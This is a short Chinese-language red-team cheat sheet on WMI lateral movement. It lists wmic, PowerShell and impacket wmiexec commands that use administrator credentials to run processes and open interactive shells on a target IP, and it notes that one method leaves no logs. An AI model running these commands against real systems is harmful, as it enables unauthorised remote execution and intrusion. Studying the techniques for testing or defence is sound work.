1. 自带WMIC
特点:
- 不会产生日志记录
- 没有回显,若要查看命令结果需要配合IPC$与type命令
wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.txt"
type \\10.1.1.2\c$\ip.txt
2. Invoke-WmiCommand.ps1
地址:https://github.com/AA8j/SecTools/tree/main/Invoke-WmiCommand.ps1
特点:
- 通过PowerShell脚本来调用WMI命令
- 有回显
Import-Module .\Invoke-WmiCommand.ps1;$User = "aa8j\administrator";$Password = ConvertTo-SecureString -String "1234567.com" -AsPlainText -Force;$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;$Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 10.1.1.2;$Remote.PayloadOutput
# $User为 域名\用户名
# -String为 "密码"
# -Payload为 {命令}
# -ComputerName为 目标IP
3. Invoke-WMIMethod.ps1
特点:
- PowerShell自带
- 无回显
$User = "aa8j\administrator";$Password = ConvertTo-SecureString -String "1234567.com" -AsPlainText -Force;$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "10.1.1.2" -Credential $Cred
# $User为 域名\用户名
# -String为 "密码"
# -ArgumentList为 "要执行的程序"
# -ComputerName为 目标IP
执行后会返回一个进程ID:
到目标机器查看:
4. wmiexec.vbs
地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点:
- 通过调用WMI来模拟PsExec功能
- 在执行诸如ping、systeminfo等命令需要添加“-waite 5000”参数
- 有回显
获得交互式shell:
cscript.exe //nologo wmiexec.vbs /shell 10.1.1.2 administrator 1234567.com
5. wmiexec.py
impacket工具包中的脚本,地址:https://github.com/SecureAuthCorp/impacket
获得一个交互式shell:
proxychains python3 wmiexec.py administrator:1234567.com@10.1.1.2
特点:
- 需要内网代理。
- 需要python环境。